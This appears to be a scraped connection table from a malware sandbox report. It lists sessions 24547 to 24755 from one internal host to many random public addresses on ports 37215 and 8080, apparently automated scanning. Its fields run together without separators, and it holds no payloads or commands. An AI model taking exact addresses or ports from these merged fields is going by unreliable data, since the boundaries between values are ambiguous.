                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24547192.168.2.235765241.4.165.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24548192.168.2.234053641.214.82.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24549192.168.2.235624641.92.91.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24550192.168.2.2351966181.157.95.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24551192.168.2.234873041.191.169.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24552192.168.2.2339086217.60.3.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24553192.168.2.2357486197.163.158.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24554192.168.2.235343041.93.228.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24555192.168.2.234263241.156.137.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24556192.168.2.2342078157.76.59.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24557192.168.2.2333060157.167.242.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24558192.168.2.2342668197.229.124.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24559192.168.2.2351566157.5.49.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24560192.168.2.2355850197.181.99.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24561192.168.2.2342400121.204.214.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24562192.168.2.235048241.219.28.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24563192.168.2.2348702197.101.50.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24564192.168.2.2349346161.237.135.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24565192.168.2.2350292157.160.114.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24566192.168.2.234716252.222.137.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24567192.168.2.2355232197.106.151.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24568192.168.2.236055441.207.122.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24569192.168.2.2334804197.236.127.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24570192.168.2.2358370157.197.124.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24571192.168.2.2354916197.241.160.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24572192.168.2.233333641.16.242.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24573192.168.2.2357642157.115.185.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24574192.168.2.23489902.52.142.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24575192.168.2.2355448197.5.70.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24576192.168.2.235897499.147.73.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24577192.168.2.2338410207.14.84.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24578192.168.2.2341570197.30.129.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24579192.168.2.2357122197.55.128.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24580192.168.2.235234036.35.239.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24581192.168.2.235522041.132.205.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24582192.168.2.235949241.164.110.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24583192.168.2.236094241.10.209.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24584192.168.2.2356604157.74.42.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24585192.168.2.233318813.106.105.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24586192.168.2.233724819.245.249.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24587192.168.2.234255218.235.24.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24588192.168.2.2344106197.192.22.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24589192.168.2.2337110157.20.118.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24590192.168.2.234254041.90.2.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24591192.168.2.2360712157.170.121.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24592192.168.2.2349044136.167.192.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24593192.168.2.233624269.214.164.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24594192.168.2.2358334157.235.99.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24595192.168.2.2342538157.95.242.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24596192.168.2.233603041.228.121.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24597192.168.2.2349920197.148.195.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24598192.168.2.234319641.49.104.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24599192.168.2.2346318157.110.168.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24600192.168.2.2342934197.150.233.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24601192.168.2.2341780157.255.74.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24602192.168.2.23384248.81.164.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24603192.168.2.2355796157.189.157.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24604192.168.2.2348104157.97.143.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24605192.168.2.2350924197.211.166.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24606192.168.2.235886474.53.90.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24607192.168.2.2343828200.238.206.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24608192.168.2.23391022.50.72.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24609192.168.2.2342126197.209.253.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24610192.168.2.233928241.219.44.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24611192.168.2.2339192197.131.166.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24612192.168.2.2353316187.76.61.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24613192.168.2.2344362197.60.83.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24614192.168.2.2355000157.24.40.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24615192.168.2.2345792197.232.50.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24616192.168.2.2351330197.109.29.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24617192.168.2.2347686157.91.126.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24618192.168.2.2356186157.221.93.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24619192.168.2.2340184197.177.106.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24620192.168.2.2339298133.224.21.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24621192.168.2.2344026197.138.247.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24622192.168.2.234946041.36.99.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24623192.168.2.2346818157.83.18.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24624192.168.2.2355376150.198.184.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24625192.168.2.2341208197.216.55.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24626192.168.2.2346342197.210.40.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24627192.168.2.2355552197.222.240.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24628192.168.2.2345742157.239.144.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24629192.168.2.2354388157.56.24.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24630192.168.2.2352498197.231.234.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24631192.168.2.234922654.108.26.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24632192.168.2.2345414157.181.210.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24633192.168.2.235765641.147.171.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24634192.168.2.2341530197.26.132.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24635192.168.2.23609604.248.246.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24636192.168.2.2343974145.240.175.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24637192.168.2.234116041.138.140.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24638192.168.2.2334824157.15.55.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24639192.168.2.2341164157.25.118.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24640192.168.2.2359136157.186.245.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24641192.168.2.2343126157.161.63.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24642192.168.2.2348108197.142.80.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24643192.168.2.234331238.201.86.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24644192.168.2.2339196197.134.113.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24645192.168.2.2348230197.104.214.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24646192.168.2.2334080104.219.146.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24647192.168.2.2333062157.77.88.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24648192.168.2.2344070197.224.154.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24649192.168.2.2359214205.34.147.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24650192.168.2.234683841.248.194.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24651192.168.2.2340720157.89.45.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24652192.168.2.2345318157.67.122.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24653192.168.2.2355950218.47.2.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24654192.168.2.2350062197.24.120.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24655192.168.2.2355922197.98.37.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24656192.168.2.2357106157.78.34.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24657192.168.2.2360938157.161.11.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24658192.168.2.2346062197.66.18.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24659192.168.2.2359634213.74.99.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24660192.168.2.2335992109.41.116.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24661192.168.2.2339442157.212.29.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24662192.168.2.234068441.244.29.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24663192.168.2.2356284197.228.4.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24664192.168.2.2358442197.85.24.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24665192.168.2.2334896148.224.148.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24666192.168.2.2357610197.40.78.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24667192.168.2.2356064208.70.100.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24668192.168.2.235947041.163.137.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24669192.168.2.234139041.43.79.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24670192.168.2.2344712128.221.215.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24671192.168.2.2335706197.194.83.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24672192.168.2.2346002114.100.146.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24673192.168.2.234238493.174.26.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24674192.168.2.2343036217.250.5.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24675192.168.2.2360884179.229.179.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24676192.168.2.233520848.245.183.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24677192.168.2.2336226149.76.120.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24678192.168.2.234547650.250.144.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24679192.168.2.2355152102.119.222.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24680192.168.2.2342050131.214.130.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24681192.168.2.2358556144.117.55.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24682192.168.2.2340556176.237.223.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24683192.168.2.2334304185.132.28.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24684192.168.2.23420482.182.47.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24685192.168.2.233602644.97.203.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24686192.168.2.235862686.54.78.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24687192.168.2.2334206154.132.205.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24688192.168.2.234371280.50.146.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24689192.168.2.2348498129.139.36.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24690192.168.2.2351788105.30.110.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24691192.168.2.234138697.163.31.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24692192.168.2.2351132197.210.49.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24693192.168.2.2360510105.245.44.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24694192.168.2.234612661.116.170.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24695192.168.2.2333032217.169.254.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24696192.168.2.2358540159.117.120.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24697192.168.2.2337796217.133.82.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24698192.168.2.234250682.122.22.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24699192.168.2.2339600203.171.248.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24700192.168.2.233609449.99.102.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24701192.168.2.235037023.218.197.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24702192.168.2.235613617.221.29.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24703192.168.2.23369049.84.119.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24704192.168.2.2360390219.155.25.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24705192.168.2.234298050.212.120.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24706192.168.2.2333236217.14.249.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24707192.168.2.2338400179.252.92.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24708192.168.2.234482673.67.81.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24709192.168.2.235308041.28.156.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24710192.168.2.2349230132.127.76.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24711192.168.2.2354234176.163.34.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24712192.168.2.2357326172.43.167.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24713192.168.2.235349017.224.73.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24714192.168.2.2332840167.154.209.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24715192.168.2.2360220123.232.208.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24716192.168.2.235686276.14.66.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24717192.168.2.233772458.232.98.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24718192.168.2.2336446112.170.83.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24719192.168.2.234781064.74.91.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24720192.168.2.2355530172.121.76.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24721192.168.2.2336124155.12.18.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24722192.168.2.2337748218.74.138.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24723192.168.2.2344530148.143.202.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24724192.168.2.2356056112.139.53.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24725192.168.2.2350944133.143.193.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24726192.168.2.235180825.152.29.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24727192.168.2.235353613.1.77.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24728192.168.2.2335822118.62.215.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24729192.168.2.235046680.189.247.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24730192.168.2.2345562137.170.41.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24731192.168.2.235580093.185.216.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24732192.168.2.2352244111.160.169.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24733192.168.2.2340240134.124.28.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24734192.168.2.2342688192.217.9.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24735192.168.2.234180834.8.28.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24736192.168.2.2341040223.158.89.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24737192.168.2.2339184181.58.34.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24738192.168.2.233534051.123.62.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24739192.168.2.235386299.122.85.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24740192.168.2.23553124.156.6.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24741192.168.2.2343014131.186.209.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24742192.168.2.235252878.36.17.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24743192.168.2.233765091.110.55.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24744192.168.2.2359334218.241.16.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24745192.168.2.235191818.96.244.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24746192.168.2.2343918115.66.53.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24747192.168.2.2336140195.10.87.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24748192.168.2.2356650132.154.3.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24749192.168.2.23448869.29.134.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24750192.168.2.2333088218.50.151.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24751192.168.2.235188645.129.145.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24752192.168.2.234749418.189.7.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24753192.168.2.2354850220.3.132.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24754192.168.2.2349754141.84.38.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24755192.168.2.2346500114.93.99.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
